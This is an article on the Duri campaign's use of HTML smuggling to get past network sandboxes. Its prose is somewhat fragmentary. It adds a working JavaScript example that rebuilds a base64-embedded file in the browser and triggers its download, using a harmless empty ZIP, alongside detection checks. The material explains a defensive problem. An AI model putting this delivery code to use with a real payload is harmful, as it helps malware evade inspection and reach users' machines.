“Traditional network security solutions like proxies, firewalls and sandboxes are based on the transfer of objects over the wire. For example, a sandbox might extract file objects such as .exe, .zip and other suspicious objects from the wire and then send them to the sandbox for detonation,” says a report published by Menlo Security.
Duri, however, relies on a technique known as "HTML smuggling".
In July, researchers at Menlo Security noticed a suspicious download that had been blocked in the browser.
What is HTML smuggling?
"With Duri, the entire payload is constructed on the client side (browser), so no objects are transferred over the wire for the sandbox to inspect," says Menlo's report.
For those interested, Outflank's Stan Hegt explains the technique in detail.
In the case of Duri, when the user clicks on the link supplied by the attacker, a chain of redirects leads them to an HTML page hosted on duckdns.org.
Split Duri payload
Interestingly, the ZIP contains an MSI file, which is not a new payload.
The Menlo report explains, “The malware that Duri downloads is not new. According to Cisco, it had previously been delivered through Dropbox, but attackers have now replaced Dropbox with other cloud hosting providers and have incorporated the HTML smuggling technique to infect endpoints.”
Researchers analyzed the MSI file and found obfuscated JScript inside it.
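The mechanism the two Menlo quotes above describe (payload assembled in the browser, a ZIP wrapping an MSI that only ever exists on the endpoint), as an added JavaScript example that is not code from Menlo's report or from the Duri campaign: the client-side decode-and-download half of HTML smuggling, paired with a magic-byte check that shows why a proxy or sandbox watching the wire never sees a ZIP object. The embedded payload is a constructed 22-byte empty ZIP (just its end-of-central-directory record), the filename `invoice.zip` and the landing-page snippet are assumptions, and `triggerDownload` only acts when run inside a browser.

```javascript
// Added example, not Menlo's or the Duri actor's code.
// Constructed sample payload: the 22-byte end-of-central-directory record of an
// empty ZIP archive (harmless, but a valid ZIP), base64-encoded as a page would carry it.
const SMUGGLED_B64 = "UEsFBgAAAAAAAAAAAAAAAAAAAAAAAA==";
const SMUGGLED_NAME = "invoice.zip"; // hypothetical filename, not from the report

// What actually travels over the wire: HTML and JavaScript text, no file object.
// The script body is abbreviated; this snippet is constructed for the example.
const LANDING_PAGE_HTML = `<html><body><script>
var p = "${SMUGGLED_B64}"; /* decode, wrap in a Blob, click an <a download> link */
</script></body></html>`;

// Client-side reconstruction: turn the embedded text back into raw bytes.
// atob() exists in browsers and in Node 16+.
function decodeSmuggledPayload(b64) {
  const binary = atob(b64);
  const bytes = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) bytes[i] = binary.charCodeAt(i);
  return bytes;
}

// Classify the reconstructed object by its magic bytes. A wire-side sandbox
// keys on exactly these signatures; they only appear after base64 decoding.
function identifyPayload(bytes) {
  const startsWith = (...sig) => sig.every((b, i) => bytes[i] === b);
  if (startsWith(0x50, 0x4b, 0x03, 0x04) || startsWith(0x50, 0x4b, 0x05, 0x06)) return "zip";
  // MSI files are OLE compound documents, same header as legacy Office formats.
  if (startsWith(0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 0x1a, 0xe1)) return "ole-compound (MSI/legacy Office)";
  if (startsWith(0x4d, 0x5a)) return "pe (exe/dll)";
  return "unknown";
}

// Defender's wire view: does the HTTP response body carry a ZIP signature?
function wireContainsZipSignature(responseBody) {
  return responseBody.includes("PK\x03\x04") || responseBody.includes("PK\x05\x06");
}

// Browser-only: wrap the bytes in a Blob and click a synthetic <a download> link.
// This is the browser feature HTML smuggling abuses to write a file to disk
// without any download request crossing the network. Returns false outside a browser.
function triggerDownload(bytes, filename) {
  if (typeof document === "undefined") return false;
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  document.body.removeChild(a);
  URL.revokeObjectURL(url);
  return true;
}

// Walk through both sides of the picture and return the findings.
function demo() {
  const bytes = decodeSmuggledPayload(SMUGGLED_B64);
  const result = {
    zipVisibleOnWire: wireContainsZipSignature(LANDING_PAGE_HTML), // false
    reconstructedType: identifyPayload(bytes),                      // "zip"
    downloadTriggered: triggerDownload(bytes, SMUGGLED_NAME),       // true only in a browser
  };
  console.log(result);
  return result;
}

demo();
```

Opening the same HTML in a real browser performs the download, which is the point: the only network artefact is a text response, and the file materialises from script on the endpoint. That is why Menlo argues for isolating or inspecting the rendered result rather than relying on object extraction from the wire.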
A detailed analysis of the Duri campaign, the Zero Trust detection approach the company used, and a long list of campaign-related indicators of compromise (IoCs) are provided in their report.